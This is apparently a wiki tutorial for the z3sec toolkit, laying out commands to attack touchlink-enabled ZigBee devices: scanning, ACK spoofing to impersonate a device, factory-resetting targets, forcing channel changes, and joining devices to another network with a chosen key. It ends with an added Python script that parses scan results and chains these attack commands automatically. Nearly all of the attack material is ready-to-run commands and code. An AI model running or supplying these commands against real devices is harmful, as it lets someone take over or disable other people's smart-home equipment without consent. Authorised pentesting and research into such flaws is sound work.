
Tutorial 1: Touchlink Attacks

IoTsec edited this page Jan 2, 2018 · 16 revisions

In the following, we present instructions to pentest ZigBee-certified devices that support touchlink commissioning.

We assume a USRP is used as the radio transceiver. If you are using a KillerBee radio (e.g., connected to /dev/ttyUSB0), substitute --sdr with --kb /dev/ttyUSB0 in all commands below.

Setup

First, connect the USRP to your host computer. To check that the USRP is detected correctly, run the following command:

$ uhd_find_devices

The output should look like this:

--------------------------------------------------
-- UHD Device 0
--------------------------------------------------
Device Address:
    type: b200
    name: MyB200
    serial: 30DCE93
    product: B200

Scan for Bulbs in the Touchlink Range

Scan all ZigBee channels for touchlink-enabled devices:

z3sec_touchlink --sdr -c all scan

If you find a touchlink-enabled device, the output looks similar to the following:

Scan responses overview:
# |RSSI |channel |src_pan_id |src_addr                |
=======================================================
0 |0    |20      |0xe21      |00:17:88:01:10:4f:44:e8 |

Alternatively, you can scan just specific channels (e.g., channel 20) via:

z3sec_touchlink --sdr -c 20 scan

If you cannot find any touchlink-enabled devices, try the following:

  • Check that the touchlink-enabled device is powered on
  • Move the radio transceiver closer (less than a meter) to the target
  • Experiment with different TX gain and antenna settings
  • Repeat the scan several times

Trigger the Identify Action

To trigger the identify action of the touchlink-enabled device with the extended address 00:17:88:01:10:4f:44:e8, run the following command:

z3sec_touchlink --sdr -c 20 identify --target 00:17:88:01:10:4f:44:e8 -d 15

This command scans for devices on channel 20 and, if the specified target is found, triggers its identify action for 15 seconds.

ACK Spoofing

If triggering the identify action does not work, follow the ACK Spoofing instructions.

An example command that triggers the identify action of a touchlink-enabled device on channel 20 for 15 seconds while spoofing another ZigBee device within wireless range of the target:

z3sec_touchlink --sdr -c 20 --src_pan_id 0xABCD --src_addr_ext 00:17:88:01:00:ed:5c:30 identify --target 00:17:88:01:10:4f:44:e8 -d 15

This command spoofs another ZigBee device, which does not itself need to support touchlink commissioning. In our example, the spoofed device has the PAN ID 0xABCD and the extended address 00:17:88:01:00:ed:5c:30. Note that the impersonated device needs to be within ZigBee range of the target device.

Reset Device to Factory-New

To reset a touchlink-enabled device to factory-new, run the following command:

z3sec_touchlink --sdr -c 20 reset --target 00:17:88:01:10:4f:44:e8

This command scans for the target device on channel 20 and, if it is found, resets the device to factory-new. Afterwards, it checks whether the reset was successful.

Change Channel

To change the channel of a touchlink-enabled device, use the following command:

z3sec_touchlink --sdr -c 20 update --target 00:17:88:01:10:4f:44:e8 --channel_new 26

This command scans for the target device on channel 20 and, if it is found, switches the device from channel 20 to channel 26.

Join to other network

Note that this attack requires knowledge of the ZLL Master Key. Provide this key in ~/.config/z3sec/touchlink_crypt.ini.

To join a touchlink-enabled device to another network, run the following command:

z3sec_touchlink --sdr -c 20 join --target 00:17:88:01:10:4f:44:e8 --channel_new 26 --addr_new 0x1234 --network_key A0A1A2A3A4A5A6A7A8A9AAABACADAEAF

This command scans for the target device on channel 20 and, if it is found, joins the device (afterwards addressed by the short address 0x1234) to a network with a random PAN ID on channel 26 and sets its network key to 0xA0A1A2A3A4A5A6A7A8A9AAABACADAEAF.
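The steps above (scan, pick the target and its channel, then identify / reset / update / join) are easy to chain in a wrapper. The following is an added example written for this tutorial and is not part of z3sec: it parses the "Scan responses overview" table printed by the scan command, selects the target (taking the strongest RSSI if a device answered on several channels), and assembles the follow-up z3sec_touchlink command line from the options shown on this page. Nothing here transmits; each function returns an argv list you can hand to subprocess.run(). The sample scan output is constructed (the second row is invented), and the 15-second identify duration is the value from the example above, not a default of the tool.

```python
"""Added example for this tutorial (not z3sec code): parse the scan table,
pick the target and build the follow-up z3sec_touchlink command line."""
import re
import shlex

# Constructed sample in the table layout printed by `z3sec_touchlink ... scan`
# (the second row is invented for illustration).
SAMPLE_SCAN_OUTPUT = """\
Scan responses overview:
# |RSSI |channel |src_pan_id |src_addr                |
=======================================================
0 |0    |20      |0xe21      |00:17:88:01:10:4f:44:e8 |
1 |-12  |11      |0x1a2b     |00:17:88:01:00:ed:5c:30 |
"""

EXT_ADDR_RE = re.compile(r"^([0-9a-fA-F]{2}:){7}[0-9a-fA-F]{2}$")
NETWORK_KEY_RE = re.compile(r"^[0-9a-fA-F]{32}$")  # 128-bit key as hex digits
ZIGBEE_CHANNELS = range(11, 27)  # IEEE 802.15.4 2.4 GHz channels 11..26


def parse_scan(output):
    """Return one dict per data row; title, header and rule lines are skipped."""
    rows = []
    for line in output.splitlines():
        cells = [c.strip() for c in line.split("|")]
        if not cells[0].isdigit():  # data rows start with the response index
            continue
        idx, rssi, channel, pan_id, addr = cells[:5]
        rows.append({"index": int(idx), "rssi": int(rssi),
                     "channel": int(channel), "src_pan_id": int(pan_id, 16),
                     "src_addr": addr.lower()})
    return rows


def find_target(rows, ext_addr):
    """Row for ext_addr; if it answered on several channels, take the strongest RSSI."""
    hits = [r for r in rows if r["src_addr"] == ext_addr.lower()]
    return max(hits, key=lambda r: r["rssi"]) if hits else None


def build_command(radio, channel, action, target, spoof=None, **opts):
    """Assemble argv for z3sec_touchlink.

    radio -- ["--sdr"] for a USRP or ["--kb", "/dev/ttyUSB0"] for a KillerBee radio
    spoof -- optional (pan_id, ext_addr) of the device impersonated for ACK spoofing
    opts  -- duration (identify), channel_new (update/join), addr_new and network_key (join)
    """
    if channel not in ZIGBEE_CHANNELS:
        raise ValueError("channel %r is not a ZigBee channel (11-26)" % (channel,))
    if not EXT_ADDR_RE.match(target):
        raise ValueError("malformed extended address %r" % (target,))
    argv = ["z3sec_touchlink", *radio, "-c", str(channel)]
    if spoof is not None:
        pan_id, src_ext = spoof
        argv += ["--src_pan_id", "0x%04X" % pan_id, "--src_addr_ext", src_ext]
    argv += [action, "--target", target]
    if action == "identify":
        argv += ["-d", str(opts.get("duration", 15))]  # 15 s as in the page's example
    elif action in ("update", "join"):
        if opts["channel_new"] not in ZIGBEE_CHANNELS:
            raise ValueError("channel_new must be a ZigBee channel (11-26)")
        argv += ["--channel_new", str(opts["channel_new"])]
        if action == "join":
            if not NETWORK_KEY_RE.match(opts["network_key"]):
                raise ValueError("network key must be 16 bytes given as 32 hex digits")
            argv += ["--addr_new", "0x%04x" % opts["addr_new"],
                     "--network_key", opts["network_key"].upper()]
    elif action != "reset":
        raise ValueError("unknown action %r" % (action,))
    return argv


def plan(scan_output, target, radio=("--sdr",), spoof=None):
    """Non-destructive step first: identify to confirm control, then reset."""
    row = find_target(parse_scan(scan_output), target)
    if row is None:
        return []  # not in touchlink range: move closer and repeat the scan
    ch = row["channel"]
    return [build_command(radio, ch, "identify", target, spoof, duration=15),
            build_command(radio, ch, "reset", target, spoof)]


if __name__ == "__main__":
    for argv in plan(SAMPLE_SCAN_OUTPUT, "00:17:88:01:10:4f:44:e8"):
        print(" ".join(shlex.quote(a) for a in argv))
```

Running the script prints the identify and reset commands for the sample target on the channel it answered on; pass a (pan_id, ext_addr) pair as spoof to get the ACK-spoofing variant, and call build_command with action "update" or "join" for the channel change and network join shown above. Ordering identify before reset or join matters in practice: identify is the only action here that leaves the device's configuration untouched, so it is the cheap check that the target is actually reachable before a destructive command is sent.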

See Tutorial 2: Takeover Attack.